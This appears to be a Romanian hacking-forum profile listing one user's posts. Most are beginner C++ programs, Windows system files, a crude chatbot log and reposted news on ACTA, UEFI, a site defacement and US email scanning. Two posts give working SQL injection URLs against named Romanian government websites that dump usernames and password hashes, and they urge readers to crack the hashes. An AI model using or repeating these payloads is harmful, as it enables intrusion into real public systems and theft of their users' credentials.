Jump to content

ionut97

Active Members
  • Posts

    233
  • Joined

  • Last visited

  • Days Won

    14

Everything posted by ionut97

  1. Salutare din nou,de ceva timp m-am apucat de c++ si m-am gandit sa pun primele mele programe aici(2 la numar). Ambele sunt de tip consola si sunt scrise destul de aiurea si au cateva probleme dar functioneaza. Primul este un calculator destul de simplu cu cateva optiuni.Un program usor de facut. Download: GirlShare - Download Calculator.exe In jur de 130 de liniute. Al doilea program este putin mai maricel dar este la fel de simplu.Este un joc de consola cam ciudat dar nu aveam idei. Download: GirlShare - Download joc.exe Este mai mare decat primul, are in jur de 1400-1500 de linii scrise si mai prost. Din cele 1400 de linii cred ca 200 sunt inutile dar l-am modificat mereu si nu am elimit ce era nefolositor. Nu pun codul sursa pentru ca ma fac de ras . Totul este scris de mine de aici si scrierea "impecabila". Sunt facute folosind Code Blocks.
  2. Eu am scris 123456789 la invitation code si a mers(cea mai simpla metoda).Am mai vazut cativa de pe rst si acolo.
  3. Japonezii nu se dezmint si vin cu o noua inventie uluitoare, desprinsa parca din filmele science fiction: arma care te…amuteste. Ciudatul dispozitiv, creat de Kazutaka Kurihara si Koji Tsukada functioneaza cu unde sonore si nu raneste in niciun fel persoana impotriva careia este folosit. Iata cum functioneaza: Aparatul inregistreaza vocea persoanei si o reda dupa numai 0,2 secunde, astfel incat se produce un ecou. Astfel, creierul uman va fi “zapacit” de ce aude si regiunea responsabila cu vorbirea se va bloca pur si simplu. Aceste “arme psihologice” pot avea intrebuintari cat se poate de practice, cred inventatorii lor. Spre exemplu, aparatul poate fi folosit in biblioteci, ca sa oblige studentii galagiosi sa taca din gura, sau la intruniri, pentru a convinge participantii sa nu intrerupa discursurile de la tribuna. De asemenea, dispozitivul poate fi folosit la protestele de strada sau pentru a reduce la tacere un politician cu opinii nepopulare, scrie Daily Mail. O alta intrebuintare utila a acestui aparat este in cazul persoanelor care se balbaie, auzirea ecoului propriei voci ii poate ajuta sa vorbeasca mai fluent, spun savantii care au inventat aceasta arma. Sursa:Arma viitorului. S-a inventat dispozitivul care se joaca cu mintea ta si te reduce la tacere - Yahoo! ?tiri România
  4. Acum o intrebare pentru cei care isi petrec majoritatea timpului/lucreaza pe linux: Ati putea sta pe windows acum cu powershell-ul fiind asemanator cu un shell linux (ca si comenzi vorbind)?
  5. Salutare! Am facut acest topic sa prezint cateva lucruri descoperite in propriul windows 7 din curiozitate care poate vor fi interesante pentru cineva. Din cate am observat windows-ul incepe sa copieze anumite lucruri de la linux, lucru care o sa il arat mai tarziu. Pentru inceput am gasit intr-un loc din system 32 o lista cu toate serviciile respectiv toate porturile si ce ar trebui sa faca. # Copyright (c) 1993-2004 Microsoft Corp. # # This file contains port numbers for well-known services defined by IANA # # Format: # # <service name> <port number>/<protocol> [aliases...] [#<comment>] # echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users #Active users systat 11/udp users #Active users daytime 13/tcp daytime 13/udp qotd 17/tcp quote #Quote of the day qotd 17/udp quote #Quote of the day chargen 19/tcp ttytst source #Character generator chargen 19/udp ttytst source #Character generator ftp-data 20/tcp #FTP, data ftp 21/tcp #FTP. control ssh 22/tcp #SSH Remote Login Protocol telnet 23/tcp smtp 25/tcp mail #Simple Mail Transfer Protocol time 37/tcp timserver time 37/udp timserver rlp 39/udp resource #Resource Location Protocol nameserver 42/tcp name #Host Name Server nameserver 42/udp name #Host Name Server nicname 43/tcp whois domain 53/tcp #Domain Name Server domain 53/udp #Domain Name Server bootps 67/udp dhcps #Bootstrap Protocol Server bootpc 68/udp dhcpc #Bootstrap Protocol Client tftp 69/udp #Trivial File Transfer gopher 70/tcp finger 79/tcp http 80/tcp www www-http #World Wide Web hosts2-ns 81/tcp #HOSTS2 Name Server hosts2-ns 81/udp #HOSTS2 Name Server kerberos 88/tcp krb5 kerberos-sec #Kerberos kerberos 88/udp krb5 kerberos-sec #Kerberos hostname 101/tcp hostnames #NIC Host Name Server iso-tsap 102/tcp #ISO-TSAP Class 0 rtelnet 107/tcp #Remote Telnet Service pop2 109/tcp postoffice #Post Office Protocol - Version 2 pop3 110/tcp #Post Office Protocol - Version 3 sunrpc 111/tcp rpcbind portmap #SUN Remote Procedure Call sunrpc 111/udp rpcbind portmap #SUN Remote Procedure Call auth 113/tcp ident tap #Identification Protocol uucp-path 117/tcp sqlserv 118/tcp #SQL Services nntp 119/tcp usenet #Network News Transfer Protocol ntp 123/udp #Network Time Protocol epmap 135/tcp loc-srv #DCE endpoint resolution epmap 135/udp loc-srv #DCE endpoint resolution netbios-ns 137/tcp nbname #NETBIOS Name Service netbios-ns 137/udp nbname #NETBIOS Name Service netbios-dgm 138/udp nbdatagram #NETBIOS Datagram Service netbios-ssn 139/tcp nbsession #NETBIOS Session Service imap 143/tcp imap4 #Internet Message Access Protocol sql-net 150/tcp sqlsrv 156/tcp pcmail-srv 158/tcp #PCMail Server snmp 161/udp #SNMP snmptrap 162/udp snmp-trap #SNMP trap print-srv 170/tcp #Network PostScript bgp 179/tcp #Border Gateway Protocol irc 194/tcp #Internet Relay Chat Protocol ipx 213/udp #IPX over IP rtsps 322/tcp rtsps 322/udp mftp 349/tcp mftp 349/udp ldap 389/tcp #Lightweight Directory Access Protocol https 443/tcp MCom #HTTP over TLS/SSL https 443/udp MCom #HTTP over TLS/SSL microsoft-ds 445/tcp microsoft-ds 445/udp kpasswd 464/tcp # Kerberos (v5) kpasswd 464/udp # Kerberos (v5) isakmp 500/udp ike #Internet Key Exchange crs 507/tcp #Content Replication System crs 507/udp #Content Replication System exec 512/tcp #Remote Process Execution biff 512/udp comsat login 513/tcp #Remote Login who 513/udp whod cmd 514/tcp shell syslog 514/udp printer 515/tcp spooler talk 517/udp ntalk 518/udp efs 520/tcp #Extended File Name Server router 520/udp route routed ulp 522/tcp ulp 522/udp timed 525/udp timeserver tempo 526/tcp newdate irc-serv 529/tcp irc-serv 529/udp courier 530/tcp rpc conference 531/tcp chat netnews 532/tcp readnews netwall 533/udp #For emergency broadcasts uucp 540/tcp uucpd klogin 543/tcp #Kerberos login kshell 544/tcp krcmd #Kerberos remote shell dhcpv6-client 546/tcp #DHCPv6 Client dhcpv6-client 546/udp #DHCPv6 Client dhcpv6-server 547/tcp #DHCPv6 Server dhcpv6-server 547/udp #DHCPv6 Server afpovertcp 548/tcp #AFP over TCP afpovertcp 548/udp #AFP over TCP new-rwho 550/udp new-who rtsp 554/tcp #Real Time Stream Control Protocol rtsp 554/udp #Real Time Stream Control Protocol remotefs 556/tcp rfs rfs_server rmonitor 560/udp rmonitord monitor 561/udp nntps 563/tcp snntp #NNTP over TLS/SSL nntps 563/udp snntp #NNTP over TLS/SSL whoami 565/tcp whoami 565/udp ms-shuttle 568/tcp #Microsoft shuttle ms-shuttle 568/udp #Microsoft shuttle ms-rome 569/tcp #Microsoft rome ms-rome 569/udp #Microsoft rome http-rpc-epmap 593/tcp #HTTP RPC Ep Map http-rpc-epmap 593/udp #HTTP RPC Ep Map hmmp-ind 612/tcp #HMMP Indication hmmp-ind 612/udp #HMMP Indication hmmp-op 613/tcp #HMMP Operation hmmp-op 613/udp #HMMP Operation ldaps 636/tcp sldap #LDAP over TLS/SSL doom 666/tcp #Doom Id Software doom 666/udp #Doom Id Software msexch-routing 691/tcp #MS Exchange Routing msexch-routing 691/udp #MS Exchange Routing kerberos-adm 749/tcp #Kerberos administration kerberos-adm 749/udp #Kerberos administration kerberos-iv 750/udp #Kerberos version IV mdbs_daemon 800/tcp mdbs_daemon 800/udp ftps-data 989/tcp #FTP data, over TLS/SSL ftps 990/tcp #FTP control, over TLS/SSL telnets 992/tcp #Telnet protocol over TLS/SSL imaps 993/tcp #IMAP4 protocol over TLS/SSL ircs 994/tcp #IRC protocol over TLS/SSL pop3s 995/tcp spop3 #pop3 protocol over TLS/SSL (was spop3) pop3s 995/udp spop3 #pop3 protocol over TLS/SSL (was spop3) kpop 1109/tcp #Kerberos POP nfsd-status 1110/tcp #Cluster status info nfsd-keepalive 1110/udp #Client status info nfa 1155/tcp #Network File Access nfa 1155/udp #Network File Access activesync 1034/tcp #ActiveSync Notifications phone 1167/udp #Conference calling opsmgr 1270/tcp #Microsoft Operations Manager opsmgr 1270/udp #Microsoft Operations Manager ms-sql-s 1433/tcp #Microsoft-SQL-Server ms-sql-s 1433/udp #Microsoft-SQL-Server ms-sql-m 1434/tcp #Microsoft-SQL-Monitor ms-sql-m 1434/udp #Microsoft-SQL-Monitor ms-sna-server 1477/tcp ms-sna-server 1477/udp ms-sna-base 1478/tcp ms-sna-base 1478/udp wins 1512/tcp #Microsoft Windows Internet Name Service wins 1512/udp #Microsoft Windows Internet Name Service ingreslock 1524/tcp ingres stt 1607/tcp stt 1607/udp l2tp 1701/udp #Layer Two Tunneling Protocol pptconference 1711/tcp pptconference 1711/udp pptp 1723/tcp #Point-to-point tunnelling protocol msiccp 1731/tcp msiccp 1731/udp remote-winsock 1745/tcp remote-winsock 1745/udp ms-streaming 1755/tcp ms-streaming 1755/udp msmq 1801/tcp #Microsoft Message Queue msmq 1801/udp #Microsoft Message Queue radius 1812/udp #RADIUS authentication protocol radacct 1813/udp #RADIUS accounting protocol msnp 1863/tcp msnp 1863/udp ssdp 1900/tcp ssdp 1900/udp close-combat 1944/tcp close-combat 1944/udp nfsd 2049/udp nfs #NFS server knetd 2053/tcp #Kerberos de-multiplexor mzap 2106/tcp #Multicast-Scope Zone Announcement Protocol mzap 2106/udp #Multicast-Scope Zone Announcement Protocol qwave 2177/tcp #QWAVE qwave 2177/udp #QWAVE Experiment Port directplay 2234/tcp #DirectPlay directplay 2234/udp #DirectPlay ms-olap3 2382/tcp #Microsoft OLAP 3 ms-olap3 2382/udp #Microsoft OLAP 3 ms-olap4 2383/tcp #Microsoft OLAP 4 ms-olap4 2383/udp #Microsoft OLAP 4 ms-olap1 2393/tcp #Microsoft OLAP 1 ms-olap1 2393/udp #Microsoft OLAP 1 ms-olap2 2394/tcp #Microsoft OLAP 2 ms-olap2 2394/udp #Microsoft OLAP 2 ms-theater 2460/tcp ms-theater 2460/udp wlbs 2504/tcp #Microsoft Windows Load Balancing Server wlbs 2504/udp #Microsoft Windows Load Balancing Server ms-v-worlds 2525/tcp #Microsoft V-Worlds ms-v-worlds 2525/udp #Microsoft V-Worlds sms-rcinfo 2701/tcp #SMS RCINFO sms-rcinfo 2701/udp #SMS RCINFO sms-xfer 2702/tcp #SMS XFER sms-xfer 2702/udp #SMS XFER sms-chat 2703/tcp #SMS CHAT sms-chat 2703/udp #SMS CHAT sms-remctrl 2704/tcp #SMS REMCTRL sms-remctrl 2704/udp #SMS REMCTRL msolap-ptp2 2725/tcp #MSOLAP PTP2 msolap-ptp2 2725/udp #MSOLAP PTP2 icslap 2869/tcp icslap 2869/udp cifs 3020/tcp cifs 3020/udp xbox 3074/tcp #Microsoft Xbox game port xbox 3074/udp #Microsoft Xbox game port ms-dotnetster 3126/tcp #Microsoft .NET ster port ms-dotnetster 3126/udp #Microsoft .NET ster port ms-rule-engine 3132/tcp #Microsoft Business Rule Engine Update Service ms-rule-engine 3132/udp #Microsoft Business Rule Engine Update Service msft-gc 3268/tcp #Microsoft Global Catalog msft-gc 3268/udp #Microsoft Global Catalog msft-gc-ssl 3269/tcp #Microsoft Global Catalog with LDAP/SSL msft-gc-ssl 3269/udp #Microsoft Global Catalog with LDAP/SSL ms-cluster-net 3343/tcp #Microsoft Cluster Net ms-cluster-net 3343/udp #Microsoft Cluster Net ms-wbt-server 3389/tcp #MS WBT Server ms-wbt-server 3389/udp #MS WBT Server ms-la 3535/tcp #Microsoft Class Server ms-la 3535/udp #Microsoft Class Server pnrp-port 3540/tcp #PNRP User Port pnrp-port 3540/udp #PNRP User Port teredo 3544/tcp #Teredo Port teredo 3544/udp #Teredo Port p2pgroup 3587/tcp #Peer to Peer Grouping p2pgroup 3587/udp #Peer to Peer Grouping ws-discovery 3702/udp #WS-Discovery ws-discovery 3702/tcp #WS-Discovery dvcprov-port 3776/tcp #Device Provisioning Port dvcprov-port 3776/udp #Device Provisioning Port msfw-control 3847/tcp #Microsoft Firewall Control msdts1 3882/tcp #DTS Service Port sdp-portmapper 3935/tcp #SDP Port Mapper Protocol sdp-portmapper 3935/udp #SDP Port Mapper Protocol net-device 4350/tcp #Net Device net-device 4350/udp #Net Device ipsec-msft 4500/tcp #Microsoft IPsec NAT-T ipsec-msft 4500/udp #Microsoft IPsec NAT-T llmnr 5355/tcp #LLMNR llmnr 5355/udp #LLMNR wsd 5357/tcp #Web Services on devices wsd 5358/tcp #Web Services on devices rrac 5678/tcp #Remote Replication Agent Connection rrac 5678/udp #Remote Replication Agent Connection dccm 5679/tcp #Direct Cable Connect Manager dccm 5679/udp #Direct Cable Connect Manager ms-licensing 5720/tcp #Microsoft Licensing ms-licensing 5720/udp #Microsoft Licensing directplay8 6073/tcp #DirectPlay8 directplay8 6073/udp #DirectPlay8 man 9535/tcp #Remote Man Server rasadv 9753/tcp rasadv 9753/udp imip-channels 11320/tcp #IMIP Channels Port imip-channels 11320/udp #IMIP Channels Port directplaysrvr 47624/tcp #Direct Play Server directplaysrvr 47624/udp #Direct Play Server Am mai gasit o lista cu protocale (TCP,UDP,etc,) destul de interesanta , nu ca nu s-ar gasi pe google din primul search . # Copyright (c) 1993-2006 Microsoft Corp. # # This file contains the Internet protocols as defined by various # RFCs. See http://www.iana.org/assignments/protocol-numbers # # Format: # # <protocol name> <assigned number> [aliases...] [#<comment>] ip 0 IP # Internet protocol icmp 1 ICMP # Internet control message protocol ggp 3 GGP # Gateway-gateway protocol tcp 6 TCP # Transmission control protocol egp 8 EGP # Exterior gateway protocol pup 12 PUP # PARC universal packet protocol udp 17 UDP # User datagram protocol hmp 20 HMP # Host monitoring protocol xns-idp 22 XNS-IDP # Xerox NS IDP rdp 27 RDP # "reliable datagram" protocol ipv6 41 IPv6 # Internet protocol IPv6 ipv6-route 43 IPv6-Route # Routing header for IPv6 ipv6-frag 44 IPv6-Frag # Fragment header for IPv6 esp 50 ESP # Encapsulating security payload ah 51 AH # Authentication header ipv6-icmp 58 IPv6-ICMP # ICMP for IPv6 ipv6-nonxt 59 IPv6-NoNxt # No next header for IPv6 ipv6-opts 60 IPv6-Opts # Destination options for IPv6 rvd 66 RVD # MIT remote virtual disk Interesant in systemul32 este ca gasim aprox. toate programele fara sa le arunce windows-ul in fata noastra(nu apar in bara start). Un program interesant mi s-a parut Resource Monitor care arata cam tot ce se petrece in calculator,arata toate programele care ruleaza ,arata toate programele care se conecteaza la internet si cat consuma,arata consumul de memorie,etc.Este un program complet. Am gasit un editor text fara interfata GUI. Cel mai interesant mi s-a parut Powershell-ul care accepta comenzi care pana acum erau specifice linux. Powershell-ul are 2 versiuni in windows-ul meu.V1 care seamana cu un command prompt normal dar accepta comenzi linux. V2 care este putin modificat ca aspect. Exista un program ,tot in acelasi loc (C:\Windows\System32\WindowsPowerShell), care este un pare a fi un compilator pentru shell-scripting. Interfata este destul de interesanta si putem da comenzi in timp ce scriem si shell-ul fara ca acesta sa fie "deranjat". Un lucru interesant este ca a ramas non-case sensitive. Am gasit si o lista cu niste comenzi care pot fi folosite in powershell si o descriere a lor. # Copyright (c) Microsoft Corporation. All rights reserved. # # THIS SAMPLE CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, # WHETHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE. # IF THIS CODE AND INFORMATION IS MODIFIED, THE ENTIRE RISK OF USE OR RESULTS IN # CONNECTION WITH THE USE OF THIS CODE AND INFORMATION REMAINS WITH THE USER. set-alias cat get-content set-alias cd set-location set-alias clear clear-host set-alias cp copy-item set-alias h get-history set-alias history get-history set-alias kill stop-process set-alias lp out-printer set-alias ls get-childitem set-alias mount new-mshdrive set-alias mv move-item set-alias popd pop-location set-alias ps get-process set-alias pushd push-location set-alias pwd get-location set-alias r invoke-history set-alias rm remove-item set-alias rmdir remove-item set-alias echo write-output set-alias cls clear-host set-alias chdir set-location set-alias copy copy-item set-alias del remove-item set-alias dir get-childitem set-alias erase remove-item set-alias move move-item set-alias rd remove-item set-alias ren rename-item set-alias set set-variable set-alias type get-content function help { get-help $args[0] | out-host -paging } function man { get-help $args[0] | out-host -paging } function mkdir { new-item -type directory -path $args } function md { new-item -type directory -path $args } function prompt { "PS " + $(get-location) + "> " } & { for ($i = 0; $i -lt 26; $i++) { $funcname = ([System.Char]($i+65)) + ':' $str = "function global:$funcname { set-location $funcname } " invoke-expression $str } } Nu sunt lucruri noi ci doar cateva lucruri gasite in windows.Puteti sa aruncati o privire si voi prin system32 daca aveti windows7. Am postat doar pentru ca poate cuiva ii va placea.Unele lucruri sunt banale dar mie mi s-au parut interesante. In concluzie acum windows-ul poate fi mai accesibil si pentru uilizatorii de linux cu ajutorul acestui powershell.
  6. ionut97

    Cleverbot

    Vad ca le are cu romana bine Cleverbot: Esti fata? User: Nu. Cleverbot: Esti baiat? User: Da. Cleverbot: Hai sa ne futem. User: . Cleverbot: Tao ka ba? User: Kaka. Cleverbot: Palaka. User: Sa revenim. Cleverbot: Sa mori tu nu eu:)). User: Ba ce robot prost mai esti. Cleverbot: Sunt robot! User: E clar ca te-ai spamat ai nostri cu porcarii. Cleverbot: TFW: Can not understand. English is not my native language. User: Se vede tu esti roman. Cleverbot: Tu de unde esti? User: Din mama. Cleverbot: De unde din romania? User: Din marea neagra. Cleverbot: Romania. User: Da da , sub nivelul marii. Cleverbot: Pod cím? User: Iar te-ai imbatat. Cleverbot: Ma culc. User: Poi daca ai baut ca porcu. Cleverbot: Ce sa te dai mare. User: Esti smecher a ? Cleverbot: Da sunt. User: Hai sa ne batem. Cleverbot: Gje zivis? User: Da da bataie. Cleverbot: For mother russia. User: For ma-ta? Cleverbot: What? User: Ma-ta-i rusia? Cleverbot: Si ma-ta o face pe centura. User: Ai intrecut masura, iti dau DDoS. Cleverbot: Nu-i nimic, e polititcos sa imi raspunzi, deci, de unde esti? User: Romania , vericule. Cleverbot: So true, So true. User: Da da. Cleverbot: Asa.
  7. interesant video , este bine ca macar au multi fani si o sa vada si lumea asta. si tot de la ei : Avaaz - ACTA: The new threat to the net
  8. Da, este. http://mt.ro/nou/comunicate.php?id=72'+and+1=2+union+select+1,2,group_concat(nm_ut,0x3a,par_ut)+from+utiliz--+ Era postat, trebuia doar sa cauti.
  9. Aparitia primelor computere a insemnat, aproape concomitent, si aparitia primilor hackeri. In ultimii 40 de ani, tentativele de pacalire a sistemelor computerizate, fie pentru interesul personal, fie ca modalitate de protest au devenit o amenintare constanta la adresa securitatii PC-urilor, telefoanelor si sistemelor informatice. Iata cele mai importante momente din istoria hacking-ului, potrivit PCWorld Inceputurile - anii '60 Primele sistemele de operare dezvoltate la MIT (Massachusets Institute of Technology) au dezvaluit primele vulnerabilitati. In 1965, a fost descoperita o problema la sistemul Multics CTSS pe un IBM 7094, prin care deschiderea repetata a editorului de text oferea parola sistemului oricarui utilizator. 1) Istoria hacking-ului - anii '70 Anii '70 sunt importanti in istoria hacking-ului datorita aparitiei hackerilor de telefoane (phreaks). Unul dintre ei, John Draper, a descoperit ca un fluier distribuit ca jucarie intr-o cutie de cereale avea aceeasi frecventa ca si sistemele telefonice AT&T. Folosind fluierul, hackerul a reusit sa creeze un sistem care ii permite sa ocoleasca sistemul de taxare al operatorului, pentru convorbiri gratuite catre orice destinatie. Fondatorii Apple, Steve Jobs si Steve Wozniack, au fost si ei implicati in productia "cutiei albastre", instrumentul de hacking bazat pe fluier. 2) Istoria hacking-ului - anii '80 In anii '80, hackerii s-au orientat in numar mai mare catre industria computerelor si au inceput chiar sa-si creeze primele unelte de comunicare online, precursoare retelei Usenet. Numarul tot mai mare de atacuri informatice a dus la crearea primei legislatii americane impotriva hackerilor in 1986. Primul caz de spionaj informatic international este judecat in 1989, iar trei hackeri din Germania au fost condamnati pentru ca au furat informatii ale autoritatilor si companiilor americane si le-au vandut KGB-ului. 3) Istoria hacking-ului - anii '90 Odata cu aparitia browser-ului Netscape Navigator in 1994, hackerii isi muta informatiile pe web. Un an mai tarziu, cativa hackeri rusi au furat 10 milioane de dolari de la Citibank. Anii 90 sunt importanti si pentru AOHELL, program care a permit hackerilor amatori sa intrerupa serviciile AOL. In 1999, Microsoft lanseaza sute de patch-uri pentru bug-uri din Windows 98, care ar putea fi exploatate de hackeri. 4) Istoria hacking-ului - anii 2000 Dupa atacurile din 2000 la adresa Yahoo!, Amazon si eBay, autoritatile sunt tot mai preocupate de securitatea informatiei si tot mai multi hackeri ajung la inchisoare. In 2001, Microsoft este victima primului atac DNS. In 2007, FBI a arestat un grup de hackeri responsabili pentru infiltrarea a 1 milion de PC-uri si daune materiale de 20 milioane dolari. 5) hacking-ul dupa anul 2010 In ultimii doi ani, cel mai important grup de hackeri s-a dovedit a fi *********, care a strans multi sustinatori prin atacurile online pe care multi le considera "in numele unor cauze nobile". ********* au organizat unul dintre cele mai mari atacuri informationale din istoria hacking-ului, cu o ofensiva asupra mai multor site-uri ale autoritatilor americane, dupa inchiderea Megaupload. Alte momente importante in istoria recenta a hacking-ului sunt Operation Aurora, prin care hackerii chinezi au furat informatii importante ale Google, desecurizarea retelei PlayStation Network, prin care au fost expuse conturile a 77 milioane de utilizatori in 2011 si "spargerea" instantanee a 700.000 site-uri de catre un hacker din Bangladesh. Sursa:O scurta istorie a hacking-ului | Hit.ro
  10. According to critics, ACTA bypasses the sovereign laws of participating nations, forcing ISP’s across the globe to act as internet police. Worse, it appears to go much further than the internet, cracking down on generic drugs and making food patents even more radical than they are by enforcing a global standard on seed patents that threatens local farmers and food independence across the developed world. Despite ACTA’s secrecy, criticism of the agreement has been whitesprend. Countries like India and Brazil have been vocal opponents of the agreement, claiming that it will do a great deal of harm to emerging economies. I’ll have more on the agreement as it emerges. But to briefly sum up, according to critics of the agreement: ACTA contains global IP provisions as restrictive or worse than anything contained in SOPA and PIPA. ACTA spans virtually all of the developed world, threatening the freedom of the internet as well as access to medication and food. The threat is every bit as real for those countries not involved in the process as the signatories themselves. ACTA has already been signed by many countries including the US, but requires ratification in the EU parliament. ACTA was written and hammered out behind closed doors. While some of the provisions have been taken out of the final US draft, plenty of unknowns still exist. It’s not nearly clear enough how the agreement will effect US laws. Source:ACTA is comming! Worse than SOPA Intellectual property must be protected, but it should not be placed above individuals' rights to privacy and data protection. Peter Hustinx, European Data Protection Supervisor (EDPS), issued a report on the Anti-Counterfeiting Trade Agreement (ACTA), claiming that it could prove unworkable under current European Union data protection laws. ACTA is legislation laundering on an international level of what would be very difficult to get through most Parliaments Stravros Lambrinidis, Member of European Parliament, S and D, Greece The European Parliament has had no representation in ACTA negotiations. Just accepting or rejecting an agreement is not an exercise of democracy as under the Lisbon Treaty. Zuzana Roithova, Member of European Parliament, EPP, Czech Republic It is extremely regrettable that democratic debate has been eliminated from talks that could have a major impact on such a fundamental freedom as free expression. Reporters without Borders, European Parliament Sakharov Prize Winners Any measures concerning people's right to go online need to be brought in through the proper democratic channels, not via self-regulation, and made into EU law Andrea D?Incecco, public affairs manager from EuroISPA (Business association of European Internet Service Providers) Third party liability for Internet Server Providers is like making the post office responsible for what is inside the letters they send. Alexander Alvaro, Member of European Parliament, ALDE, Germany. We can only assume that the final text could do great harm in developing countries and undermine the balance between the protection of intellectual property and the need to provide affordable medicines for poor people. Rohit Malpani, OXFAM, from a press release criticising possible impact of ACTA. We are in danger of ending up with the worst of both worlds, pushing IP rules, which are very effective at stopping access to life-saving drugs but are very bad at stopping or preventing fake drugs. Michelle Childs of Médecins Sans Frontières, Nobel Peace Prize winners, has issued a very critical statement on ACTA. Sorce:Stop ACTA !
  11. Zone-h hacked by HcJ, Cyb3R-1sT and Egyptian.H4x0rZ Zone-h, a very well-known website for all hackers specially for mirrors has been hacked by Arabian hackers. In fact, the whole server has been compromised. The security of the website and even the server is very strong as huge numbers of hackers visit the website everyday. The hacker showed that the website's server had an updated 2011 kernel. The sites have previously fallen victim to hacking attacks as well. This is the second time the websites got owned by someone. The deface page states the name of 6 hackers. The reason of the hack might be the complains of different hackers regarding Zone-h. The message which was left in the deface page is as under: "To be OR not TO be Note : It's Unacceptable when we tried to notify defaced.zone-h.net and found tNote : It's Unacceptable when we tried to notify defaced.zone-h.net and found this message " nice try" it's not a try it's a real! your server rooted, all the websites hacked, all people knew that ! and it's the third time to hack your websites 2 of them in 2010( 2010/04/02 > brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers to notify your sites, it's the real courage !" Hacked Sites: Zone-H.org - Unrestricted information Zone-H.org - Unrestricted information Zone-H.org - Unrestricted information Zone-H.fr - Information sans restriction Zone-H.com.br - Informação sem Restrição Source:Zone-h hacked by HcJ, Cyb3R-1sT and Egyptian.H4x0rZ |The Security Ray - TSR | The Source Of All Underground Hacking (Hacker) , Security And Tech News
  12. http://sibiu.prestatiisociale.ro/legislatie.php?id=%285%29%20%27%20%20/*!UnIoN*/+/*!SelEcT*/+1,2,group_concat%28table_name%29,4,5+/*!FrOm*/+information_schema.tables--+--a Dar nu are useri. Inca unu: http://mt.ro/nou/comunicate.php?id=72%27+and+1=2+union+select+1,2,group_concat%28nm_ut,0x3a,par_ut%29%20from%20utiliz--+ Incercati sa spargeti hash-ul.
  13. Red Hat, Canonical raise objections at Linux.conf.au. Open Source companies Red Hat and Canonical have highlighted serious concerns about a Microsoft plan to rid the world of rootkits, arguing that Redmond’s UEFI technology is "buggy". Microsoft’s UEFI is an attempt to address the recent explosion in the number of viruses and other malware targeting low-level system services. Known as rootkits, these attacks are capable of infecting systems at a level that's difficult or impossible to detect with traditional anti-virus software, and often require complete system rebuilds to fix. One particular weak point has been the PC's BIOS - the basic code that executes when the computer starts. The BIOS is stored on a separate chip rather than a hard disk, so an infected BIOS will stay infected even if everything else on the system is wiped clean. BIOS rootkits have been spotted in the wild as recently as September 2011, prompting Microsoft and Intel to work on a solution. That solution is UEFI, a complete rewrite of BIOS to make it faster, better, more secure, and standardised across different PCs, tablets and smartphones. The key security feature within it is called Secure Boot, which uses cryptographic signatures to prevent untrusted code from running at the BIOS level. Microsoft has announced that all Windows 8 certified systems will be required to implement UEFI. In a presentation to Linux.conf.au, Red Hat mobile Linux developer Matthew Garrett called UEFI "infuriating", "poorly tested" and full of "an incredible number of bugs". UEFI has ten times more code than BIOS, he noted, none of which has enjoyed the benefit of decades of testing and real-world use. Garrett is concerned UEFI may actually be less secure until it has matured further. He cited examples of exploitable bugs that permanently prevent the system from starting, among other consequences. Worse still, UEFI's standardisation means that a single bug could compromise a huge range of different devices. For large desktop deployments, this could lead to significant maintenance issues, he noted. If a particular UEFI implementation is compromised, its permission can be revoked remotely by Microsoft or the hardware vendor, meaning that the computers it runs on won't boot until they are updated. Patch Tuesday could go from being an inconvenience to a complete work stoppage. A whitepaper [pdf] published by Red Hat and Canonical warned that the specification makes no mention of how to deal with security problems, and places no restrictions on grounds for OEMs to revoke permission. It could be entirely possible that competitors might ban each others' keys. To address these issues, Microsoft has required that vendors implement Custom Mode, which allows an end-user or administrator to manually control what is allowed and what isn't. A site with custom hardware, for example, might use this to cryptographically sign their own drivers. Users and administrators can even disable UEFI completely, allowing any code to run. But Garrett is still unsatisfied. Firstly, although UEFI is standardised, its interface is not, he argues. Each vendor might have their own, different way of configuring these settings, making it difficult to manage or document across heterogenous systems. Secondly, it is not possible to do this unattended; an administrator would need to set up each computer individually. And finally, on ARM systems, such as tablets and some promising future low-powered laptops, Custom Mode is not available. Canonical and Red Hat want the benefits of UEFI, but are clearly worried that Microsoft is the only authority guaranteed control over any system shipped with a Windows 8 logo. Representatives from both open source companies also worry that the difficulties involved in key management will lock out smaller Linux distributions, and make it unlikely that all vendors will add Linux to their trusted list. Copyright © iTnews.com.au . All rights reserved. Source: Microsoft takes aim at rootkits, misses - Hardware - Technology - News - iTnews.com.au
  14. The US Government's newly-incepted PRODIGAL programme has been raising privacy concerns. PRODIGAL - which stands for the Proactive Discovery of Insider Threats Using Graph Analysis and Learning - is capable of scanning no less than 250 million digitally-created messages every single day. That's all the emails, text messages and instant messenger-type communications sent within just US federal agencies and the US military. The programme's sheer coverage scope has provoked concerns that, soon, the US Government's eyes will be on every single piece of data transmitted between US residents. US Government Email Scanning The US government email-scanning system is the brainchild of Georgia Institute of Technology, with assistance from DARPA - the US Defense Advanced Research Projects Agency responsible for progressing a host of military technologies. PRODIGAL's brain is trained on unusual features within the normal data stream: key words that stand out or occur repeatedly, non-standard email addresses and atypical file server transfers. Solely concerned at the moment with data exchanged between federal agency workers and members of the US military, PRODIGAL's coverage could nonetheless expand to wider US society, its critics suggest. "Every time someone logs on or off, sends an email or text, touches a file or plugs in a USB key, these records are collected within the organization", Professor David Bader from Georgia Tech School of Computational Science and Engineering explained to Fox News. Government Daily Text Scans Bader played down ideas, however, that what's being carried out within PRODIGAL could extend beyond the government's current levels of daily text scans, email-reading and message analyses. PRODIGAL, he said, only works in conjunction with internal systems, as opposed to the internet at large. Rather, through looking closely at the type of information being sent, potential soldier fatalities could be avoided and potential classified data leaks could be stopped. In this way, said Bader, PRODIGAL is comparable to the Raytheon SureView system and the post-9/11 Einstein project, both of which aim to detect suspicious activities. PRODIGAL will be in operation for two years at a total cost of $9m. Besides Georgia Institute of Technology and DARPA, other organisations involved include Carnegie Mellon and Oregon State universities and the University of Massachusetts. Source: US Government Scans 250m Daily Emails and Texts: Security Tech. News
